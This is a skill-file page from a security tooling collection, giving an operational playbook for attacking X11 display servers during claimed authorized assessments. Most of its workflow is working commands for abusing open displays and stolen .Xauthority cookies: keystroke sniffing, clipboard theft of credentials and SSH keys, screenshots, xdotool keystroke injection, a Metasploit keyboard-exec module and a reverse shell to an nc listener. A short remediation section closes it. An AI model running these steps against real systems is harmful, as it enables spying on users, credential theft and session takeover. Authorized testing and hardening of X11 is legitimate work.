pentesting-x11

$npx mdskill add xalgord/xalgorix/pentesting-x11

- During authorized assessments when TCP 6000+ is open (X11 display server) - When testing for unauthenticated X11 access (`xhost +` style misconfiguration) - When you have a local foothold and can read a valid `~/.Xauthority` cookie - When you want screenshots, clipboard contents, keystroke capture, or input injection from an X session - When pivoting from a captured display to command execution on the host

SKILL.md

.github/skills/pentesting-x11View on GitHub ↗
---
name: pentesting-x11
description: Testing the X Window System (X11) display server during authorized engagements. X11 listens on TCP
  6000+<display> and the local Unix socket /tmp/.X11-unix/X<display>. Covers detecting unauthenticated ("xhost +")
  access with nmap NSE and Metasploit, abusing MIT-MAGIC-COOKIE-1 auth tokens from ~/.Xauthority, window/clipboard
  enumeration, keystroke sniffing (xspy), screenshotting (xwd), live shadowing, and keystroke injection (xdotool) for
  command execution.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- x11
- linux
- keylogging
- remote-desktop
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting X11 (port 6000)

## When to Use

- During authorized assessments when TCP 6000+ is open (X11 display server)
- When testing for unauthenticated X11 access (`xhost +` style misconfiguration)
- When you have a local foothold and can read a valid `~/.Xauthority` cookie
- When you want screenshots, clipboard contents, keystroke capture, or input injection from an X session
- When pivoting from a captured display to command execution on the host

## Quick Enumeration

```bash
# Check for anonymous (open) X11 access
nmap -sV --script x11-access -p 6000 <IP>
msf> use auxiliary/scanner/x11/open_x11

# Local triage (post-foothold) — find DISPLAY and cookie
echo "$DISPLAY"
ls -lah /tmp/.X11-unix/
ps -efww | grep -E '[X]org|[X]wayland'      # look for -auth <file> in cmdline
xauth info
xauth list

# Shodan-style discovery
# port:6000 x11
```

## Critical: Checks Most Often Missed

1. **Open X11 (no auth)** — `xhost +` or open access control lets any host connect to display :0 with no token. Confirm with `x11-access` / `open_x11`, then enumerate windows directly.
2. **MIT-MAGIC-COOKIE-1 reuse** — the 128-bit cookie in `~/.Xauthority` is sent in plaintext and grants full access. If you can read the file (or another user's), export `XAUTHORITY=/path/to/.Xauthority` and connect.
3. **Cookie via Xorg `-auth` argument** — the X server's command line often reveals the authoritative auth file path (`ps -efww | grep Xorg`), readable with sufficient privileges.
4. **Access ≠ "just graphics"** — a connected display enables window enumeration, clipboard theft, screenshots, keystroke sniffing, and input injection (effectively RCE in the user's session).
5. **Unix socket foothold** — even when 6000/tcp is closed, a local foothold + valid cookie abuses `/tmp/.X11-unix/X<display>`.
6. **XSendEvent ignored** — apps often drop injected events sent to a specific window; activate the window first, then inject normal key events for reliability.

How to CONFIRM: open access is confirmed when `xdpyinfo -display <IP>:0` or `xwininfo -root -tree -display <IP>:0` returns display/window data without an auth error. With a cookie, confirm by setting `XAUTHORITY` and running the same command successfully.

## Workflow

### Step 1: Enumerate (detect, find display + cookie)

```bash
# Remote anonymous check
nmap -sV --script x11-access -p 6000 <IP>

# Local: identify the active display and session
w                                            # shows DISPLAY (e.g. :0) and WHAT
echo "$DISPLAY"; ls -lah /tmp/.X11-unix/
xauth list                                   # cookies known to this user

# Use a cookie you obtained
export XAUTHORITY=/path/to/.Xauthority
```

### Step 2: Authenticate / connect and inspect the display

```bash
# Display + screen info confirms access
xdpyinfo -display <IP>:<display>
xwininfo -root -tree -display <IP>:<display>     # window tree + IDs

# Follow-up enumeration
xlsclients -display <IP>:<display>
xprop -root _NET_ACTIVE_WINDOW -display <IP>:<display>
xinput --list --display <IP>:<display>
```

### Step 3: Exploit / Extract (sniff, clipboard, screenshot)

```bash
# Keystroke sniffing
xspy <IP>:<display>
xinput --test_xi2 --display <IP>:<display>       # monitor input events

# Clipboard theft (credentials, tokens, SSH keys, password-manager pastes)
xclip -display <IP>:<display> -selection clipboard -o
xsel  --display <IP>:<display> --clipboard --output

# Screenshot the root window
xwd -root -screen -silent -display <IP>:0 > screenshot.xwd
convert screenshot.xwd screenshot.png

# Live shadowing of a window / display
xwininfo -root -display <IP>:0                   # get window ID (e.g. 0x45)
./xwatchwin <IP>:0 -w 0x45                       # live view
xpra shadow :0                                   # maintained alternative
```

### Step 4: Post-access / command execution

```bash
# Keystroke injection -> run commands in the user's session
WID=$(xdotool search --onlyvisible --name '.*' | head -n 1)
xdotool windowactivate --sync "$WID"
xdotool type --delay 50 'xterm &'
xdotool key Return
# (activating the window first beats XSendEvent filtering)

# Metasploit keyboard-exec module
msf> use exploit/unix/x11/x11_keyboard_exec

# xrdp.py command exec / reverse shell over X11
./xrdp.py <IP>:0
./xrdp.py <IP>:0 --no-disp                        # then use R-Shell to a nc listener
nc -lvp 5555
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **X11 / X Window System** | Network-capable windowing system for UNIX-like OSes |
| **Display number** | Maps to TCP 6000 + display and Unix socket /tmp/.X11-unix/X<display> |
| **MIT-MAGIC-COOKIE-1** | 128-bit shared secret in ~/.Xauthority sent plaintext to authorize clients |
| **XAUTHORITY** | Env var pointing to the auth cookie file |
| **xhost access control** | Host-based ACL; `xhost +` disables it (open access) |
| **Input injection** | Sending synthetic key/mouse events (xdotool) to the session |
| **XSendEvent filtering** | Apps ignore synthetic events targeted at a window; activate-then-type instead |
| **Shadowing** | Live viewing/control of a display via xwatchwin / xpra |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **nmap** (x11-access) | Detect unauthenticated X11 access |
| **Metasploit open_x11 / x11_keyboard_exec** | Detect open displays and inject commands |
| **xauth** | Inspect/manage MIT-MAGIC-COOKIE auth tokens |
| **xdpyinfo / xwininfo / xlsclients / xinput** | Display, window, client, and input enumeration |
| **xspy** | Keystroke sniffing on a connected display |
| **xclip / xsel** | Read clipboard/primary selection contents |
| **xwd + convert** | Capture and convert screenshots |
| **xwatchwin / xpra** | Live window/display shadowing |
| **xdotool** | Keystroke/mouse injection for command execution |

## Common Scenarios

### Scenario 1: Open Display Screenshot
`nmap --script x11-access` flags display :0 as open. `xwd -root -display <IP>:0` captures the desktop, exposing an open terminal and a password manager window.

### Scenario 2: Cookie Reuse
A readable `~/.Xauthority` is pulled from a foothold. Setting `XAUTHORITY` and running `xdpyinfo` confirms access; `xspy` then captures the user typing a sudo password.

### Scenario 3: Clipboard Secret Theft
Connected to a display, `xclip -selection clipboard -o` returns a freshly copied SSH private key, reused to authenticate to other hosts.

### Scenario 4: Input Injection to RCE
With access to display :0, `xdotool` activates a visible window and types commands to spawn a reverse shell, turning display access into code execution in the user's session.

## Output Format

```
## X11 Finding

**Service**: X Window System (X11)
**Severity**: <Critical|High|Medium>
**Host**: <IP>:6000 (display :<n>)
**Access**: <open/no-auth | cookie-reuse>

### Summary
<What was found: open display, reusable cookie, keystroke capture, clipboard theft, RCE via injection>

### Evidence
- Command: <nmap / xdpyinfo / xspy / xclip / xdotool>
- Output: <display info, sniffed keystrokes (redacted), screenshot path>

### Impact Demonstrated
| Capability | Result |
|------------|--------|
| Screenshot | desktop captured |
| Keylogging | credentials observed |
| Input injection | command executed in user session |

### Recommendation
1. Never disable X11 access control (`xhost +`); use cookie-based auth only
2. Tunnel X11 over SSH (X11 forwarding) instead of exposing TCP 6000
3. Disable the X server TCP listener (`-nolisten tcp`) where not required
4. Protect ~/.Xauthority files and restrict the Xorg -auth file permissions
5. Firewall ports 6000-6010 from untrusted networks
```

More from xalgord/xalgorix

SkillDescription
abusing-hop-by-hop-headersTesting proxies, load balancers, and CDNs for improper handling of HTTP hop-by-hop headers, where an
analyzing-macos-persistence-and-autostartEnumerating, planting, and hunting macOS persistence and auto-start (ASEP) locations during authorized
api-discoveryAPI endpoint discovery including OpenAPI/Swagger detection, hidden versioning, REST/GraphQL enumeration, and content negotiation
bypassing-binary-exploitation-mitigationsMethodology for identifying and defeating common binary hardening mitigations during authorized exploitation —
bypassing-captcha-protectionsIdentifying weaknesses in CAPTCHA implementations and bypassing them via replay, field removal,
bypassing-macos-gatekeeper-tcc-and-sipAssessing and bypassing macOS userland and platform security controls during authorized engagements -
bypassing-restricted-shellsEscaping restricted shells (rbash, rksh, lshell), chroot jails, and language sandboxes (Lua, Python)
bypassing-two-factor-and-otpIdentifying and exploiting flaws in two-factor authentication and one-time password verification
deepExhaustive security assessment with maximum coverage, depth, and vulnerability chaining
exploiting-ai-model-file-rceTesting machine-learning model files and model-loading services for remote code execution caused by insecure